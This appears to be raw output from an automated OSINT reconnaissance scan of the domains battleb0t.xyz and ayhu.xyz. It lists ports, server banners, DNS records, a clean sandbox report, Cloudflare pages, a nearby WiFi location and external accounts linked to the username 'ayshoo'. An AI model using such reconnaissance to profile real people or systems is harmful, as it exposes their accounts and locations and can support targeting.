| 2023-05-12 02:53:35 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 872A:0A4B:BBF254:10FE511:645C54E0
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100052-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683772640.067376,VS0,VE28
Vary: Accept-Encoding
X-Fastly-Request-ID: 13b6057c2e99facbd081defdf7bc9d1ff579d6e4
| 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f606c5dec334e-EWR | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2086 | 188.114.97.1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | apple network 06223f (Net ID: 00:02:2D:06:22:3F) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Kongregate (Category: gaming)
https://www.kongregate.com/accounts/login | login |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://nuke.battleb0t.xyz | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.9): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:57:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.bolomia.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:80"\n "34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.bolomia.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC089.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.bolomia.com" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.bolomia.com" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e28_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e28_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3624"\n "IsoScope_e28_ConnHashTable<3624>_HashTable_Mutex"\n "IsoScope_e28_IESQMMUTEX_0_303"\n "IsoScope_e28_IESQMMUTEX_0_519"\n "IsoScope_e28_IE_EarlyTabStart_0xd5c_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3624"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.bolomia.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "D44LOOV2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D44LOOV2.txt]- [targetUID: 00000000-00003624]\n Dropped file: "OLGW3LVM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OLGW3LVM.txt]- [targetUID: 00000000-00003624]\n Dropped file: "QN3CBW6Z.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QN3CBW6Z.txt]- [targetUID: 00000000-00003624]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC088.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpwww.bolomia.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003480]\n "_4C3DCED8-71A5-11ED-9C1B-08002737D871_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "D44LOOV2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D44LOOV2.txt]- [targetUID: 00000000-00003624]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DFF9EB6DC9100DFF38.TMP" has type "data"- Location: [%TEMP%\\~DFF9EB6DC9100DFF38.TMP]- [targetUID: 00000000-00003624]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "OLGW3LVM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OLGW3LVM.txt]- [targetUID: 00000000-00003624]\n "CabC088.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC088.tmp]- [targetUID: 00000000-00003480]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF97F6CEE582564B07.TMP" has type "data"- Location: [%TEMP%\\~DF97F6CEE582564B07.TMP]- [targetUID: 00000000-00003624]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003624]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003480]\n "QN3CBW6Z.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QN3CBW6Z.txt]- [targetUID: 00000000-00003624]\n "~DF784A20DAD1D5BC00.TMP" has type "data"- Location: [%TEMP%\\~DF784A20DAD1D5BC00.TMP]- [targetUID: 00000000-00003624]\n "XVNE2LAN.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\XVNE2LAN.txt]- [targetUID: 00000000-00003480]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.bolomia.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.bolomia.com/"\n Pattern match: "http://www.bolomia.com"\n Pattern match: "www.bolomia.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'6388fef0bb265f2d7e041e56', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': | 34.148.97.127 |
| 2023-05-12 03:01:23 | Web Server | No | Tool - WhatWeb | 0 | 1 | 1 | 0 | None | GitHub.com | battleb0t.xyz |
| 2023-05-12 02:53:17 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:4700:3031::ac43:8709 | ayhu.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | nwapi.battleb0t.xyz |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Disqus (Category: social)
https://disqus.com/by/ayshoo/ | ayshoo |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 2 | 0 | 3 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6036feab195d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="xHEPK.9yJ4uMnlaQxqQ03K5Csvr7WqmdHv5Obe9KwF8-1683860053-0-AVLFWFwz5cW9coePC-vcYYHeZXoVyZvPTnO5FSb69_py4IiBnIT69jsbDrQcjp17Zdx1pnQSJS5VK5u2qIZwYpKNdgBE5WortG78wVuw6xpL5WYKY8Pci1GRr-7IBheF2wnVhBXoAAbVv_kvF_G81MlD02OBybPgpztHUD8TsNxjUjxn5wbC4eO6XMoHSPC4tPjeAbdNC_mEhVDvKltWOjEKs7cQGG73dOqgzgZ5u0yyPTVVyh672vGUJchUE-7DlMtIc30cGk9vDedhhqnCEm6pQHqEqKn7E1c0_xe56xpqCOyx0gVIxxZL8ZolJaAY4W4DtMmEP6W2tHpS_rYvBDI9fm43yWOoTbxEvpOBUd21ETXlvv9NENQqsCUvjbm4kjTEkCkt9i7ao6sYMKBDIKOrBrqKSvX_CT_w9eydgmcnRxeGAnGPZ1UUlMCuPuHg11UNYHIqPBTtKLbqJ0CVo0se3b48fGi-sK8cLCpgZLWb2fRokqIeBAyscADBAfixig610ec8NyTnlho4fWsEuVJ8IH0YuFSDI5qB-p_hHDFAgQ4e2o5glLWVxkylixix8LPq3AjtUqJZW7z32u6RcNlBfPCJCrP_P-wzAtCmBv9wwLgJM8s28Fc0U3NqhEI7UzCd5r2rd1L9dZdXgwaESjOHBhuzibRb747KWauMhNoTHcDBBW-Cplvyyky4fhJh4codwoIMSFuB2e8vqSriOeMyuMhff86CdrTUwmJ-MpOwS5b3SzLp4WsUmqgXo5R_Ptn_13EQTYvgg_fn9wQYMVvNul0EzUw-m0dzAaXiayW9ZQRIKrGrxHaH77vlgDYfon_mV1EHNo0mYKenjF4lATYUDXOdsHJGDEb-aoyHMedXT2xjfifF75YrCt7aKEBajKaabeBOm93QKGtGLkUbhjuxR1Cv3fMl-a8Mcq-sqIzDY7Ofms_NojFVCky1MxilEB-pECoh_3dTQi7RdzrUTwf2cZR9T8D8U2K3Gvk8riLAICiz8kZstCExyU1gQxK_8IKsvToQ9RDrd9y9LVAX9qYv3TfadD1EkNEsFVChUuXBIn1vLV2P2GOPSzKbMN6zXhMlaXjRniTwtw6d8mrDXwAGH5ieemrcUb3FjxXespiPiaHaem6NlgnFXh6fqC6miAGPTygfZ8E84F8EVSFKovIkpjZZLkzg9smKqoObMwmWAc8hXyTmDTP1LoHTnasWw3kR_c4rubMdm-bM_qzcdotudBYUrTeL52K6MUKh8U0LXxV1ssRlYQtn51j2ZPTCT_4njX0UJZi7Aqe8bZOIi6YaJ6JVsLLVQlGwMIkxweehKTweGkzepoKrlA3vvzsnIuw6hwdTbMC1ff1nqZDuEXn1iUtY0QVWk3AiHWDwvflyRUhJFVQ_1RWCY6QxNbtBWuOs4Gsp4MKA65Y2bcGJNUQ61JSZsl8YoM493x6bgQq2c1ARXqI8Z_BprKNhAkkBaHzNAZnBx2sKG-aiygeREJS_Y-EXoEZkRsbQX02jydwcJZ3mjFQKdYrYE5cpUbTynwFh1r8orCm-Lgkh_khmNL7q7VDaHkkpQxyvlai7E7fXqkM8fGYOO32gd0hDiIlm85y2e8PdcZwTHglcg5WuEl3dz67kdyLqQrK_w0NhcEVoQlt-w-zjK_ug7gJVFCqVZy6o3CJv3Lkws4Pg2ePLly9U4qZNVRt3zz5hcKoCs-Pa1ZZzJ_Qzb2gSMP3u4cNDexag1H59HlUfcR7rjMJpsPYzqNpSQW3aa4RjeYciW4G4IbxfKJhCeUuFM4E4frBI_2OUYka-3R16-e5B-3ARb0HzAH7oGbA0ldmTnvfk1irgRMe8Dly0jpz5UNRE52UktWtSquB5QC1854VbxxgX4hhaW-nxmTCdOLafGYF1vg8rF-8NC1_FbTKMqIVsNKBWX0k0kJqiJjLCwjxEgXQ0Ze8manGpGGX8Y1qPfnNzHc2wFXLAoenNI_c9mp5k_TulxRQaJau67nLCYZqdFCfQ3OMpvtX4xDex5PrZ9T6mJUZ1nmSTAUixBLPwpRedqy1s01H2wlDBkSOhsj3ve3tA6H7ilQqtLQdfAuHK0_eW1Lnq3yDEyuzONZ1kc6hBMbhcyIePtyej1WeNa25rCw6imHPfgLzKSCX7sag3MiyXZyiVPtZsVrR333h3qptvAltAf6opML25pqpe_uKUHyc688RAlp_EgHCq-Gbx-iN5q2hY5Ny4xRPFJdCIjbFhNtGVw4MmWaJvAiePWPHqtweVVadLDMPlJCf3alqy71aqsxQI2WCWYRD_4Slgey6lOkSSsS-VG0B1_pBFsI7Qoqg4mLVGYQxVgLA66wEWyPhSdzuYryBNRXVwsWkB269be5JcqZIZNgC1b12-boaqHNSrCKMj83nOOm100RSF9-42ajHgNdPc9977LoOsIdA4wiwXyaum_ok5aRH8NPa5DUgCLteaEnABaI691YwS3Yv94Jp3MSd41yoh45wgGe42SPtQxw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '8897',
cRay: '7c5f6036feab195d',
cHash: '461a186bf737deb',
cUPMDTk: "\/?__cf_chl_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '2ToLICUBPb7XpOOLU5MHBc4J5yG0oheUGtehN/w3ZVsFmzDAbOvCroJJwwrRkjNV6Tn52KN/9nB7B8sz2NSv9/9dxRAmoEg1HGzmozU2NACMuujm6XlVF5ozcbqn9ZBfwSat/mPFIuXurAISwgnINkk9AtugcpCUQHziQl+hs46Tkaidb6rhmNGYloX58NMp6/dt44yfsmywuLVXcAFkah1saaFWiETNA22oPOLsKwdZLjZF/57cZ6U7IE+U9u08hSy2LwMl1S56XHXIPlPdXyU5wEzETE40l9LPy3liHtZ+0sFpGwOEjIvxrQ5T+yTbOd6FLXQq2biCWHdXzGq4q/Z6wpMSuxwTK5+LQiEDYzatOhFmeim8d5on6i6XRRqVjrZwVw7DnLXOPTyWGBSUGsicd01O/2CEnxT4kImRgcQduMx6bhGCiOWw7czbee4tF0zlsS59dzRB//Ht7dvKhDA88UnMm0xLzbHkJ9p9hx93IVifAjtUzWhW/2Y09mfOKl8wDJzjQdRxKsjlPBcyuT+2r0jZJkNDjSBjms0IuC9kDZ1UDHsrKoZzpFM/Of20',
t: 'MTY4Mzg2MDA1My41OTUwMDA=',
m: '5/J7gGK8XmEBWkArTjJaJQpVmCj5kenNaxHbI91xZvc=',
i1: 'd1xtl4gFAsGt/e5zgSdIvg==',
i2: 'L38k4kp9xxsqGxDFehGWAg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6036feab195d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6036feab195d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
